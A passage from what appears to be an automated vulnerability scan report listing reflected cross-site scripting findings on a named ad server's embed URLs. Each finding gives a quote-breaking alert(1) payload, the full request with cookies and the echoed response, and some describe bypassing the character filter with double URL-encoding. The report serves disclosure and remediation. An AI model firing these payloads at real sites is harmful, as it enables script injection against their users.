       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f99d94a'-alert(1)-'4c886f70b75';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d7f
...[SNIP]...

5.121. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef261'-alert(1)-'59d2a35347c was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQef261'-alert(1)-'59d2a35347c&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:23 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:38345:1296399023:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:23 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQef261'-alert(1)-'59d2a35347c&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

5.122. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c6bc'-alert(1)-'9bf2b8ea5fa was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=282534882c6bc'-alert(1)-'9bf2b8ea5fa&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:50:00 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:38345:1296399000:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:50:00 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=282534882c6bc'-alert(1)-'9bf2b8ea5fa&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       
...[SNIP]...

5.123. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0675'-alert(1)-'1d0a1b63990 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Gc0675'-alert(1)-'1d0a1b63990&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:41 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:38345:1296398981:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:49:41 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 852

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=Gc0675'-alert(1)-'1d0a1b63990&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

5.124. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206** [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8f8c'-alert(1)-'f1bcb22b6f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2F_@2F_@3F4ae1b?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&c8f8c'-alert(1)-'f1bcb22b6f0=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L|33:353:23:3:0:38345:1296350848:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:51:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:51:13 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:38345:1296399073:L|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L; expires=Tue, 01-Mar-2011 14:51:13 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=842662894&PG=INVSRQ&ASID=a06ba72a17b94ee896a6f183bcdee2f9&c8f8c'-alert(1)-'f1bcb22b6f0=1';
       var iRM = new Image();
       iRM.src = 'http://redcated/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

5.125. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dec90"-alert(1)-"90ddf5ba23f was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639dec90"-alert(1)-"90ddf5ba23f&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296351609**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639dec90"-alert(1)-"90ddf5ba23f&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.126. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cf2d"-alert(1)-"7ab97a50287 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061259cf2d"-alert(1)-"7ab97a50287&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/353.0.js.120x30/1296351649**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=13946061259cf2d"-alert(1)-"7ab97a50287&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.127. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [ASID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b596a"-alert(1)-"06aa7f69f1c was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8b596a"-alert(1)-"06aa7f69f1c HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8b596a"-alert(1)-"06aa7f69f1c">
...[SNIP]...

5.128. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [PG parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e350c"-alert(1)-"866fa489770 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQe350c"-alert(1)-"866fa489770&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/353.0.js.120x30/1296351662**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQe350c"-alert(1)-"866fa489770&ASID=0932f0fa7bd044ce92444252d58da2c8">
...[SNIP]...

5.129. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2726b%2522%253balert%25281%2529%252f%252fe9adb046056 was submitted in the REST URL parameter 2. This input was echoed as 2726b";alert(1)//e9adb046056 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313572726b%2522%253balert%25281%2529%252f%252fe9adb046056/353.0.js.120x30/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:43:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a6313572726b";alert(1)//e9adb046056/353.0.js.120x30/1296351787**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=093
...[SNIP]...

5.130. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c2a%2522%253balert%25281%2529%252f%252f53353438aff was submitted in the REST URL parameter 3. This input was echoed as 34c2a";alert(1)//53353438aff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3034c2a%2522%253balert%25281%2529%252f%252f53353438aff/1394606125?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce92444252d58da2c8 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:43:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x3034c2a";alert(1)//53353438aff/1296351797**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/93000000000038010.1?!&&PID=8010639&UIT=G&TargetID=28253488&AN=1394606125&PG=INVSRQ&ASID=0932f0fa7bd044ce924
...[SNIP]...

5.131. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1394606125

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa01b"-alert(1)-"1b5b12782c4 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

